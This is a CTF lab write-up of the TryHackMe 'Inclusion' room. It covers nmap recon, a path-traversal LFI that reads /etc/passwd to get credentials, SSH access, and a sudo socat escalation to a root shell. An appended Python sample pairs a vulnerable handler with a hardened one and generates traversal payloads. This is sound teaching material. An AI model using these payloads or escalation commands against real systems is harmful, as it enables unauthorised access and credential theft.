This is a write-up covering the steps taken to solve the Inclusion room on TryHackMe, a beginner-level challenge on local file inclusion (LFI).
This blog is written as part of the tasks of the Masters Certification in Red Team Program from HackerU.
Step 1 : Connect to TryHackMe and start the target machine.
1. Download the OpenVPN configuration file from the TryHackMe platform.
2. Connect to TryHackMe by running the following command in a Kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start the machine in the ‘Inclusion’ room; the target IP address is displayed within a minute.
Step 2 : Information gathering using Nmap
- Start an Nmap scan of the target IP (-A already enables OS detection, version detection, default scripts and traceroute, so -O is redundant but harmless):
nmap -A -O <target ip>
Step 3 : Detailed findings
Open ports:
22 : ssh OpenSSH 7.6p1
80 : http Werkzeug httpd 0.16.0
1. Accessed the open ports; port 80 serves a web application (Werkzeug is the WSGI server behind Flask apps).
2. Clicking ‘View details’ under the ‘LFI-attack’ article gives a hint to explore LFI.
3. Accessed ../../../../etc/passwd by passing it as the ‘name’ parameter in the URL:
http://10.10.xx.xxx/article?name=../../../../etc/passwd
The passwd file is displayed; it contains one regular user account, and that user’s password is present in the file (highlighted in the screenshot). Reading /etc/passwd confirms the traversal works; the same parameter can then be used to read any other file the web server’s user can open.
4. As port 22 is open, attempted an SSH login with the discovered username and password; the login succeeded.
ssh <username>@<targetip>
5. Found the user.txt flag.
6. To find the root flag, checked the sudo privileges of this user and found a NOPASSWD entry for /usr/bin/socat:
sudo -l
7. Since socat can be run as root without a password, looked up the sudo entry for socat on GTFOBins.
8. Ran the command below in the SSH session on the target (not on Kali). sudo runs socat as root, and socat’s exec: address launches /bin/sh as that same root user with its stdin and stdout wired to socat’s, so the resulting shell is root. Note that this shell is not attached to a tty; socat’s exec address accepts a pty option if a proper terminal is needed.
sudo socat stdin exec:/bin/sh
9. Navigated to /root and found root.txt.
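The following is an added example, not code from the TryHackMe room or from this write-up’s author. It models the kind of Werkzeug/Flask handler behind /article?name=... that produces the LFI above, shows a hardened resolver beside it, generates the ../ payloads for an unknown directory depth, and parses the leaked /etc/passwd for SSH candidates. The room’s source is not shown on the page, so ARTICLE_DIR and the join-then-open handler shape are assumptions, the passwd content is a constructed sample, and the ‘webdev’ account is hypothetical.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import urlencode

# ASSUMPTION: the app keeps article files here and the /article handler opens
# ARTICLE_DIR joined with the raw 'name' parameter. The room's source is not on
# the page; the four '../' that worked there suggest a directory four levels deep.
ARTICLE_DIR = "/var/www/app/articles"

# Shells that cannot be used for an interactive SSH login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/bin/sync"}


def vulnerable_resolve(name: str) -> str:
    """Path the vulnerable handler would open for ?name=<name>.
    The input is joined and normalised with no containment check, so '../'
    segments walk out of ARTICLE_DIR and an absolute name replaces it outright
    (that is how posixpath.join treats a leading '/')."""
    return posixpath.normpath(posixpath.join(ARTICLE_DIR, name))


def safe_resolve(name: str) -> Optional[str]:
    """Hardened handler: normalise, then refuse anything that does not stay
    strictly inside ARTICLE_DIR. Uses commonpath rather than a string-prefix
    test so that '../articles2/x' cannot slip past as a sibling directory."""
    if "\x00" in name:                      # a NUL would truncate the path in a C-level open()
        return None
    candidate = posixpath.normpath(posixpath.join(ARTICLE_DIR, name))
    if candidate == ARTICLE_DIR:            # '' or '.' would open the directory itself
        return None
    if posixpath.commonpath([ARTICLE_DIR, candidate]) != ARTICLE_DIR:
        return None
    return candidate


def traversal_payloads(target: str, max_depth: int = 8) -> list:
    """Candidate 'name' values when the base directory's depth is unknown:
    climb 1..max_depth levels before descending to the target file."""
    rel = target.lstrip("/")
    return ["../" * depth + rel for depth in range(1, max_depth + 1)]


def lfi_url(base: str, name: str) -> str:
    """Request URL for one payload, e.g.
    http://10.10.xx.xxx/article?name=../../../../etc/passwd"""
    return base.rstrip("/") + "/article?" + urlencode({"name": name}, safe="/")


PASSWD_LINE = re.compile(r"^([^:]+):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$")


def parse_passwd(text: str):
    """Split a leaked /etc/passwd into (login_users, odd_lines).

    login_users: 7-field entries whose shell allows an interactive login; these
    are the SSH candidates. odd_lines: anything else. /etc/passwd has no comment
    syntax, so stray lines are exactly where hand-placed notes (and credentials)
    end up, and they deserve a manual look."""
    users, odd = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = PASSWD_LINE.match(line)
        if m is None:
            odd.append(line)
            continue
        user, _pw, uid, _gid, gecos, home, shell = m.groups()
        if shell in NOLOGIN_SHELLS:
            continue
        users.append({"user": user, "uid": int(uid), "gecos": gecos,
                      "home": home, "shell": shell})
    return users, odd


# Constructed sample of what the LFI might return; it is not the room's real
# file, and 'webdev' is a hypothetical account name.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
#maintenance note: temporary account, remove after migration
webdev:x:1000:1000:webdev,,,:/home/webdev:/bin/bash
"""

if __name__ == "__main__":
    payload = traversal_payloads("/etc/passwd", 4)[-1]
    print("request        :", lfi_url("http://10.10.xx.xxx", payload))
    print("vuln app opens :", vulnerable_resolve(payload))
    print("fixed app opens:", safe_resolve(payload))
    users, odd = parse_passwd(SAMPLE_PASSWD)
    print("SSH candidates :", [u["user"] for u in users])
    print("lines to check :", odd)
```

The containment check in safe_resolve is the whole fix: the file name is still taken from the user, but anything that normalises to a path outside ARTICLE_DIR is refused, which is the same property Werkzeug’s safe_join enforces. On the offensive side, traversal_payloads covers the case where the depth is unknown; extra ../ segments are harmless because the kernel treats /.. as /, which is why over-shooting with eight of them still lands on /etc/passwd.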
With these steps, I was able to answer the questions posted in the Inclusion room on TryHackMe.
Thank you for reading this blog.